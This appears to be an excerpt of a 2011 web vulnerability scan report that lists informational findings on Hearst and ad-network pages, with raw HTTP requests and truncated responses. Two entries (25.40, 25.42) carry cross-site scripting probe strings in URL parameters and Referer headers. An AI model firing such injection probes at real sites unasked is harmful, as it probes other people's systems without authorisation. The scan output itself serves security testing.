X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 11168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.31. http://hearst.com/newspapers/albany-times-union.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/albany-times-union.php

Request

GET /newspapers/albany-times-union.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/the-advocate.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:53 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 12041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.32. http://hearst.com/newspapers/hearst-news-service.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/hearst-news-service.php

Request

GET /newspapers/hearst-news-service.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/seattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:22 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 10765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.33. http://hearst.com/newspapers/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/index.php

Request

GET /newspapers/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/press-room/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:38 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 12876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.34. http://hearst.com/newspapers/localedge.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/localedge.php

Request

GET /newspapers/localedge.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/hearst-news-service.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:32 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 14862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.35. http://hearst.com/newspapers/metrix4media.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/metrix4media.php

Request

GET /newspapers/metrix4media.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/localedge.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:27:12 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 11041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.36. http://hearst.com/newspapers/seattlepicom.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/seattlepicom.php

Request

GET /newspapers/seattlepicom.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/albany-times-union.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:11 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 12173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.37. http://hearst.com/newspapers/the-advocate.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/the-advocate.php

Request

GET /newspapers/the-advocate.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:42 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 11239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.38. http://hearst.com/press-room/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /press-room/index.php

Request

GET /press-room/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/corporate-mark-e-aldam.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:11 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 38533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.39. http://hearst.com/press-room/pr-20110817a.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /press-room/pr-20110817a.php

Request

GET /press-room/pr-20110817a.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/press-room/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:32 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Length: 4333
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.40. http://hfm.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Request

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:52 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: cm8dccp=1316277291;Path=/;Expires=Sun, 18-Sep-2011 16:34:51 GMT;
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 574
Connection: close
Content-Type: text/html

window.CM8DispatcherApps=window.CM8DispatcherApps||[];
window.CM8DispatcherApps.push('http://hfm.checkm8.com/adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http
...[SNIP]...
25.41. http://loadus.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9pYi5hZG54cy5jb20vZ2V0dWlkP2h0dHA6Ly9sb2FkbS5leGVsYXRvci5jb20vbG9hZC8%2FcD0yMDQmZz0wMTEmYmk9JFVJRCZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPg%3D%3D&h=f1ffe0dba83264310d05134a36461417 HTTP/1.1
Host: loadus.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: xltl=eJxdjsFOwzAQRP%252FF90jetXft3Z5CG0QhQiKhLTdkx7FU9Yg4IMS%252Fk0bqpbc5vDczSVl%252Fv9SpOex3ZrMkVGOBYmHPEavlXKMEzBYniYGEfJGVW4z26WaUmgCAnfgIs5OpiicJzCUVSzPmKweg5vtcPke0fujWMSA1QM6KB0AOAmjvyf3rdh1hNdktJ6hQw1Sx8bbGJglKM2XGHEuZ0ny71g%252BLdVYICDZQuOtsdx9XDoOabduNXf84nixc3p5%252Fjv3Dy%252BH9cixu8Gbz9w%252BvWUoK; BFF=eJzllk1ugzAQhe%252FCCfwD2DibpEZVkQKNElSl2VRZdt1lm7vXxg4M4DFqsqqy9Tczz36JeT6rrFDfX4oSlbSUpM26KAqWrD4VFYysDOAqqV%252Bb9mX7%252FvFWHao2WZ2VTKM9mV%252BHY2AtD4ATGELzYcgJLI1qOQSm%252BMBIWjX6h1BLs47m8ioxUAhYD6Y9oid%252BrxToH4e9umq%252F1%252BNEtK%252FlEFAHNk9wijQkvwKwNq7mkPgz1%252BVhdOZhqwOFgPVg2iN6Auu9TLtvIjKOBmQMQGQMCchUzVtExtGAjAGIjCEBmU159DJ5QMbRgIwB0x7Rk8mgui7XeUEylgLAu3VYKcDJ2JpSKdICOzmDIB1OPu8aT51tAzbPoRxviUtqrln4twrRfNTOCKMEYj40z5gAFzVqhsbM0DEz9IIZOmaGXjJDR83QcTP0nMH7zezfTmL3mwX%252Bqv5%252By4AR3WWN2Ot4wCF7mVF7%252FVTUXtuM2nvdEmpvJ43a69sxe20zZm931xn2wXEU%252FxJkASO6Ho7b63jAITsTtddPRe21zai91y2h9nbSM1qopNxsa3tQODV1y5PCqnkOFZrlkN6uiX1%252Fd0iaGIB9f3fNZNC%252BNkcykSngz8e79X7hcsvD5NZXCP7YQN8Vf3pECCKQB4Mn8QcD%252Fi5YeALgSb8Q6nh2L8Q0nsZo8C7m7CPG6eOl5h3h%252BHgZeEfU%252FbNEQ%252FJrIa3wUELy5%252FIL0yupaA%253D%253D; TFF=eJydlEuShCAMQO%252FSJwjhE8BNH2O2LlxM1exmdl1990FF5GdXcGGB1nsmgcDslfavXy%252FQPwSoJwp4OufwMc0e%252Fevbiyk8hBAGOKbvhhcrLysep%252F019yhpPCOMoC5ITKQw8d%252FL1%252FIz%252Fy31v0WkdWWkKnS36gB95OuqN76sIWUWNa6xRsKggMROZobswa%252FTltdlnJ0v4kSPksYzwrdmP0RTQ%252FiU56RFrwabemqdtnxdg206JHqUNK5x7CN0972fWcaz41DSRjND2%252B1IoJO3Hb7uyI0vzkr0KGlcY4ukzRNArpHs1RlrukCdnhCWlLtlOicJ75jGgUbFNssq73r6pmfYns7WRloR7g22Kk8VoXMTX4mUPJ4RRm1G7wro3RW794EfWu%252FMY683JW0oktRjFZ380Pk6vMFTUkYc6vXMG1v70%252BP3eunRyJ7tGrdfA84i3%252F8vd03b; EVX=eJyVkEEOwyAMBP%252BSF3gNxmAeY%252BWYc49V%252Fl6aiFZUbZLeLM2yHjOb2n2xUorU2eQ5U70Zsk1Iml2dKToFdnFMdTG8aKZOBU475U6V0SgkOVHwtNMw0u0todP4QYO86bop5qbIg%252BLXNTguArLG0qpwVtXCqZBwvBhuiqlFw%252F%252BK40%252FwyQEhA4rrUvojOhavD7fjg8M%253D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:37:08 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3
Content-Length: 147

<HTML><BODY><img src="http://ib.adnxs.com/getuid?http://loadm.exelator.com/load/?p=204&g=011&bi=$UID&j=0" width="1" height="1"></img></BODY></HTML>
25.42. http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.contextweb.com
Path:   /creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html

Request

GET /creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html HTTP/1.1
Host: media.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535461.9033442320916087634.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; cw=cw; FC1-WC=53620_1_3ELLi; vf=2; 530930_4_90495_1=1316277840578

Response

HTTP/1.1 200 OK
Cteonnt-Length: 248
Content-Type: text/html
Last-Modified: Wed, 05 Jan 2011 16:52:38 GMT
Accept-Ranges: bytes
ETag: "0cf72f5f8accb1:43d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 17:05:29 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 248

<script language="JavaScript">
var zflag_nid="1432"; var zflag_cid="1"; var zflag_sid="1"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14";
</script>
<script language="JavaScript" s
...[SNIP]...
25.43. http://metrix4media.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrix4media.com
Path:   /

Request

GET / HTTP/1.1
Host: metrix4media.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 5615
Content-Type: text/html
Content-Location: http://metrix4media.com/index.html
Last-Modified: Wed, 19 Jan 2011 23:36:58 GMT
Accept-Ranges: bytes
ETag: "08951c331b8cb1:492f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:25:04 GMT

<html>
<head>
   <title>Metrix4Media, LLC - Home</title>
   <link type="text/css" href="style.css" rel="stylesheet">
   <script type="text/javascript">
       image1 = new Image();
       image1.src = "images/b
...[SNIP]...
25.44. http://networkadvertising.org/consumer/opt_out.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networkadvertising.org
Path:   /consumer/opt_out.asp

Request

GET /consumer/opt_out.asp HTTP/1.1
Host: networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=about_our_ads.ascx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 244
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title></title>
   <meta http-equiv="refresh" content="0;url=http://www.networkadvertising.org/managing/opt_out.asp">
...[SNIP]...
25.45. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Request

GET /engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352) HTTP/1.1
Host: pbid.pro-market.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: anSt=0+4+jT2beH|oV~T<n4#E)_`zjW4wf*Qvx=eu!T<iaR@{Sq/yP&nYQ%J8`bOr))FB\!!7>g\2N$\$K\EZu'W~9Jr162wg:MyYeDw6H=`m&L`^PS@:^Azn!I61/ytF(`LCA!ZB0}3S5\!!LH]\2N$\$K\z5%vEThH>_B=#7tJy5e"N%U)(O~aq/'tziEX.Em|J0q=!o.tNsexTp@[J<T\!!7>g\2N$\$K; anTHS=42%7C1312579892800%23; anTD4=omMtz0ElZavIaEGuzNfzmpj8mdQ1xOk70fBZtnElvasmQ%7C_320100%7C122555%7C1312579892444%7C8%2C14%2C18%23omMtz0ElZavIaEGuzNfzmpj8mdQ1xOk70fBZtnElvasmQ%7C_160800%7C122555%7C1312579892444%7C8%2C4; anHistory=2vzuu3+2+!%11d$j#Q(515#$Y#N/F1Y9$K#KKk; anProfile=2vzuu3+0+s0=(6f)+h=bc+1m=1+rv=(-8)+1j=57:1+rt='32177B6A'+rs=c+1f=d+4=2lx

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app2.ny
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:55:27 GMT
Connection: close

<html><body rightmargin=0 leftmargin=0 topmargin=0 bottommargin=0><SCRIPT LANGUAGE="JavaScript">
<!--
try {
var tcdacmd="dt";
var t="search+for+local+businesses+events+and+coupons+near+yo
...[SNIP]...
25.46. http://sana.newsinc.com/sana.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sana.newsinc.com
Path:   /sana.html

Request

GET /sana.html?wid=1709&uut=802756E5-8724-4943-AEFB-8B9150565A781316021953542&furl=http://widget.newsinc.com/_fw/common/toppicks_common1.html&purl=&ssid=stamford_hom&anid=90009&ltype=1&plid=507&rdm=665188203 HTTP/1.1
Host: sana.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "b36bf549d471e0b15dc89899e8b573f7:1307641380"
Last-Modified: Thu, 09 Jun 2011 17:42:59 GMT
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:23:17 GMT
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head></head>
<body></body>
<html
...[SNIP]...
25.47. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Request

GET /sensor4.js?GID=14531;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/UJ3/iview/295138956/direct/01/6447245?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B234716514%3B0-0%3B1%3B33263296%3B4252-336/280%3B40530567/40548354/1%3B%3B%7Eokv%3D%3Bsz%3D336x280%3Btile%3D2%3Bpos%3D4%3Bsite%3Dseventeen%3Bsect%3Dindex%3Bsub%3Dindex%3Bsubsub%3Dindex%3Bpage%3Dhomepage%3Bcat%3Dother%3Bsubcat%3D%3Btool%3Dros%3Bartid%3D%3Bkw%3D%3Ba%3D%3Bb%3D%3BmtfIFPath%3D/cm/shared/admeld/%3Bgame%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G14853=C1S98373-1-0-0-0-1315398787-0; G15493=C1S99917-4-0-0-0-1315313090-907727

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G14531=C1S102386-3-0-0-0-1316276740-852; path=/; domain=.suitesmart.com; expires=Thu, 15-Mar-2012 16:39:52 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:39:52 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...
25.48. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/donatemydress_us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/donatemydress_us

Request

GET /ad/iframe/303/hearst_us/728x90/donatemydress_us?t=1316294771335&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.donatemydress.org%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
